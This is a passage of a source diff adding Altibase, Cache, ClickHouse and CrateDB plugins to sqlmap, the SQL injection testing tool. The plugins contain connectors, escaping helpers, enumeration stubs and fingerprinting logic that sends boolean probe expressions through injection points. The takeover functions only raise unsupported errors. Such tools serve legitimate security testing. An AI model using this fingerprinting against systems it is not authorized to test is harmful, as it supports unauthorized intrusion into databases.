Takeover): + """ + This class defines Altibase methods + """ + + def __init__(self): + self.excludeDbsList = ALTIBASE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.ALTIBASE] = Syntax.escape diff --git a/plugins/dbms/altibase/connector.py b/plugins/dbms/altibase/connector.py new file mode 100644 index 00000000000..bf0f66a6c42 --- /dev/null +++ b/plugins/dbms/altibase/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Altibase it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/altibase/enumeration.py b/plugins/dbms/altibase/enumeration.py new file mode 100644 index 00000000000..467897eb336 --- /dev/null +++ b/plugins/dbms/altibase/enumeration.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getStatements(self): + warnMsg = "on Altibase it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getHostname(self): + warnMsg = "on Altibase it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/altibase/filesystem.py b/plugins/dbms/altibase/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/altibase/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/altibase/fingerprint.py b/plugins/dbms/altibase/fingerprint.py new file mode 100644 index 00000000000..8c99a80ea1f --- /dev/null +++ b/plugins/dbms/altibase/fingerprint.py @@ -0,0 +1,95 @@ +#!/usr/bin/env python 
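# Editorial aside (illustrative, not part of the patch): AccessMap above, and the
# AltibaseMap/CacheMap/ClickHouseMap/CrateDBMap classes elsewhere in this patch,
# replace the explicit chain of base-class __init__ calls with a loop over
# self.__class__.__bases__. A minimal sketch with simplified stand-in mixins,
# showing what the loop buys (adding or removing a mixin no longer means editing
# __init__ by hand):
class _Syntax(object):
    def __init__(self):
        self.syntax_ready = True

class _Fingerprint(object):
    def __init__(self):
        self.fingerprint_ready = True

class _ExampleMap(_Syntax, _Fingerprint):
    def __init__(self):
        for cls in self.__class__.__bases__:  # _Syntax, then _Fingerprint
            cls.__init__(self)

_m = _ExampleMap()
assert _m.syntax_ready and _m.fingerprint_ready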
+ +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import ALTIBASE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.ALTIBASE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.ALTIBASE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(ALTIBASE_ALIASES): + setDbms(DBMS.ALTIBASE) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.ALTIBASE + logger.info(infoMsg) + + # Reference: http://support.altibase.com/fileDownload.do?gubun=admin&no=228 + result = inject.checkBooleanExpression("CHOSUNG(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.ALTIBASE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("TDESENCRYPT(NULL,NULL) IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.ALTIBASE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.ALTIBASE) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.ALTIBASE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/altibase/syntax.py b/plugins/dbms/altibase/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/altibase/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/altibase/takeover.py b/plugins/dbms/altibase/takeover.py new file mode 100644 index 00000000000..abc2f4d9f61 --- /dev/null +++ b/plugins/dbms/altibase/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import 
Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Altibase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Altibase it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Altibase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Altibase it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/cache/__init__.py b/plugins/dbms/cache/__init__.py new file mode 100644 index 00000000000..b4c8abdce26 --- /dev/null +++ b/plugins/dbms/cache/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CACHE_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.cache.enumeration import Enumeration +from plugins.dbms.cache.filesystem import Filesystem +from plugins.dbms.cache.fingerprint import Fingerprint +from plugins.dbms.cache.syntax import Syntax +from plugins.dbms.cache.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class CacheMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Cache methods + """ + + def __init__(self): + self.excludeDbsList = CACHE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CACHE] = Syntax.escape diff --git a/plugins/dbms/cache/connector.py b/plugins/dbms/cache/connector.py new file mode 100644 index 00000000000..2f2d3c5102f --- /dev/null +++ b/plugins/dbms/cache/connector.py @@ -0,0 +1,77 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import jaydebeapi + import jpype +except: + pass + +import logging + +from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ + User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html + API: - + Debian package: - + License: LGPL & Apache License 2.0 + """ + + def connect(self): + self.initConnection() + try: + msg = "please enter the location of 'cachejdbc.jar'? 
" + jar = readInput(msg) + checkFile(jar) + args = "-Djava.class.path=%s" % jar + jvm_path = jpype.getDefaultJVMPath() + jpype.startJVM(jvm_path, args) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + try: + driver = 'com.intersys.jdbc.CacheDriver' + connection_string = 'jdbc:Cache://%s:%d/%s' % (self.hostname, self.port, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) + except Exception as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except Exception as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/cache/enumeration.py b/plugins/dbms/cache/enumeration.py new file mode 100644 index 00000000000..4ac3e1acca7 --- /dev/null +++ b/plugins/dbms/cache/enumeration.py @@ -0,0 +1,48 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from lib.core.settings import CACHE_DEFAULT_SCHEMA +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getCurrentDb(self): + return CACHE_DEFAULT_SCHEMA + + def getUsers(self): + warnMsg = "on Cache it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Cache it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Cache it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on Cache it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getRoles(self, *args, **kwargs): + warnMsg = "on Cache it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Cache it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/cache/filesystem.py b/plugins/dbms/cache/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/cache/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/cache/fingerprint.py b/plugins/dbms/cache/fingerprint.py new file mode 100644 index 00000000000..909f42d2442 --- /dev/null +++ b/plugins/dbms/cache/fingerprint.py @@ -0,0 +1,113 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.common import 
hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS +from lib.core.session import setDbms +from lib.core.settings import CACHE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CACHE) + + def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("$ZVERSION LIKE '%IRIS%'"): + fork = FORK.IRIS + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CACHE + if fork: + value += " (%s fork)" % fork + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CACHE_ALIASES): + setDbms(DBMS.CACHE) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CACHE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("$LISTLENGTH(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.CACHE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("%EXTERNAL %INTERNAL NULL IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CACHE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CACHE) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CACHE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/cache/syntax.py b/plugins/dbms/cache/syntax.py new file mode 100644 index 00000000000..9a23d5195a1 --- /dev/null +++ b/plugins/dbms/cache/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHAR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/cache/takeover.py b/plugins/dbms/cache/takeover.py new file mode 100644 index 00000000000..332b33887e0 --- /dev/null +++ b/plugins/dbms/cache/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap 
developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Cache it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Cache it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Cache it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Cache it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/clickhouse/__init__.py b/plugins/dbms/clickhouse/__init__.py new file mode 100755 index 00000000000..ff10ae10c88 --- /dev/null +++ b/plugins/dbms/clickhouse/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CLICKHOUSE_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.clickhouse.enumeration import Enumeration +from plugins.dbms.clickhouse.filesystem import Filesystem +from plugins.dbms.clickhouse.fingerprint import Fingerprint +from plugins.dbms.clickhouse.syntax import Syntax +from plugins.dbms.clickhouse.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines ClickHouse methods + """ + + def __init__(self): + self.excludeDbsList = CLICKHOUSE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CLICKHOUSE] = Syntax.escape diff --git a/plugins/dbms/clickhouse/connector.py b/plugins/dbms/clickhouse/connector.py new file mode 100755 index 00000000000..83a868de757 --- /dev/null +++ b/plugins/dbms/clickhouse/connector.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + pass diff --git a/plugins/dbms/clickhouse/enumeration.py b/plugins/dbms/clickhouse/enumeration.py new file mode 100755 index 00000000000..8c12e1aad5a --- /dev/null +++ b/plugins/dbms/clickhouse/enumeration.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on ClickHouse it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on ClickHouse it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} diff --git a/plugins/dbms/clickhouse/filesystem.py b/plugins/dbms/clickhouse/filesystem.py new file mode 100755 index 00000000000..5be3e8a779d --- /dev/null +++ b/plugins/dbms/clickhouse/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + 
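# Editorial aside (illustrative, not part of the patch): the Altibase and Cache
# fingerprint plugins above, and the ClickHouse one below, share the same
# checkDbms() shape -- fire a boolean probe built around a DBMS-specific function,
# confirm with a second probe, then persist the result with setDbms() (the real
# code also fetches the banner). A minimal sketch of that control flow, where
# check_expression and set_dbms are hypothetical stand-ins for
# inject.checkBooleanExpression and setDbms:
def check_dbms(name, probes, check_expression, set_dbms):
    """Return True only if every DBMS-specific probe evaluates to True."""
    for probe in probes:
        if not check_expression(probe):
            print("the back-end DBMS is not %s" % name)
            return False
    set_dbms(name)
    return True

# e.g. with the ClickHouse probes used below:
# check_dbms("ClickHouse",
#            ["halfMD5('abcd')='16356072519128051347'",
#             "generateUUIDv4(1)!=generateUUIDv4(2)"],
#            check_expression, set_dbms)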
+""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on ClickHouse it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on ClickHouse it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/clickhouse/fingerprint.py b/plugins/dbms/clickhouse/fingerprint.py new file mode 100755 index 00000000000..1419d4dc62e --- /dev/null +++ b/plugins/dbms/clickhouse/fingerprint.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import CLICKHOUSE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CLICKHOUSE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CLICKHOUSE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CLICKHOUSE_ALIASES): + setDbms(DBMS.CLICKHOUSE) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CLICKHOUSE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("halfMD5('abcd')='16356072519128051347'") + + if result: + infoMsg = "confirming %s" % DBMS.CLICKHOUSE + logger.info(infoMsg) + result = inject.checkBooleanExpression("generateUUIDv4(1)!=generateUUIDv4(2)") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CLICKHOUSE) + self.getBanner() + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/clickhouse/syntax.py b/plugins/dbms/clickhouse/syntax.py new file mode 100755 index 00000000000..93da628052a --- /dev/null +++ b/plugins/dbms/clickhouse/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class 
Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT char(97)||char(98)||char(99)||char(100)||char(101)||char(102)||char(103)||char(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("char(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/clickhouse/takeover.py b/plugins/dbms/clickhouse/takeover.py new file mode 100755 index 00000000000..6e16590937b --- /dev/null +++ b/plugins/dbms/clickhouse/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on ClickHouse it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on ClickHouse it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on ClickHouse it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on ClickHouse it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/cratedb/__init__.py b/plugins/dbms/cratedb/__init__.py new file mode 100644 index 00000000000..c9e2259bf0d --- /dev/null +++ b/plugins/dbms/cratedb/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CRATEDB_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.cratedb.enumeration import Enumeration +from plugins.dbms.cratedb.filesystem import Filesystem +from plugins.dbms.cratedb.fingerprint import Fingerprint +from plugins.dbms.cratedb.syntax import Syntax +from plugins.dbms.cratedb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class CrateDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines CrateDB methods + """ + + def __init__(self): + self.excludeDbsList = CRATEDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CRATEDB] = Syntax.escape diff --git a/plugins/dbms/cratedb/connector.py b/plugins/dbms/cratedb/connector.py new file mode 100644 index 00000000000..0c5e5436180 --- /dev/null +++ b/plugins/dbms/cratedb/connector.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import psycopg2 + import psycopg2.extensions + psycopg2.extensions.register_type(psycopg2.extensions.UNICODE) + psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY) +except: + pass + +from lib.core.common import getSafeExString +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: http://initd.org/psycopg/ + User guide: http://initd.org/psycopg/docs/ + API: 
http://initd.org/psycopg/docs/genindex.html + Debian package: python-psycopg2 + License: GPL + + Possible connectors: http://wiki.python.org/moin/PostgreSQL + """ + + def connect(self): + self.initConnection() + + try: + self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) + except psycopg2.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.set_client_encoding('UNICODE') + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except psycopg2.ProgrammingError as ex: + logger.warning(getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except (psycopg2.OperationalError, psycopg2.ProgrammingError) as ex: + logger.warning(("(remote) '%s'" % getSafeExString(ex)).strip()) + except psycopg2.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + if self.execute(query): + retVal = self.fetchall() + + return retVal diff --git a/plugins/dbms/cratedb/enumeration.py b/plugins/dbms/cratedb/enumeration.py new file mode 100644 index 00000000000..4c9e66b39e2 --- /dev/null +++ b/plugins/dbms/cratedb/enumeration.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on CrateDB it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on CrateDB it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} diff --git a/plugins/dbms/cratedb/filesystem.py b/plugins/dbms/cratedb/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/cratedb/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/cratedb/fingerprint.py b/plugins/dbms/cratedb/fingerprint.py new file mode 100644 index 00000000000..7a6b6f545df --- /dev/null +++ b/plugins/dbms/cratedb/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import CRATEDB_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CRATEDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end 
